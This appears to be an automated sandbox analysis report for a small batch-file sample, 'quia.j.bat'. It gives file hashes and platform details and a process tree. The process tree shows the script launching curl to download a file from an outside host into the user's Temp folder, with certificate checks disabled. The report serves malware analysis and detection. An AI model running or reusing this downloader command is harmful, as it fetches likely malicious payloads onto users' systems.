Analysis
-
max time kernel
68s -
max time network
75s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
25-01-2024 17:02
Static task
static1
Behavioral task
behavioral1
Sample
quia.j.bat
Resource
win7-20231215-en
windows7-x64
0 signatures
150 seconds
General
-
Target
quia.j.bat
-
Size
133B
-
MD5
6c5a557069319c0ff00434150d32e97a
-
SHA1
2b27ca6080f644bf97b7157f868af1f49f1a4916
-
SHA256
530aedacb0c00ded2e6c989d9d1885f5f92a6eca74368f9b49c3954821fef1c2
-
SHA512
a57db26944c39772d4b978f47f9db6174551d7dc6e138e35072ef7e27887ca9565a24469df1670897c4caeb72df03ad8fd0b92a8e6f2049b16465d77dc56e3e3
Malware Config
Signatures
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\quia.j.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\system32\curl.execurl "https://filersed.com/IHq/506593203" --output "C:\Users\Admin\AppData\Local\Temp\qui.k" --ssl-no-revoke --insecure --location2⤵PID:820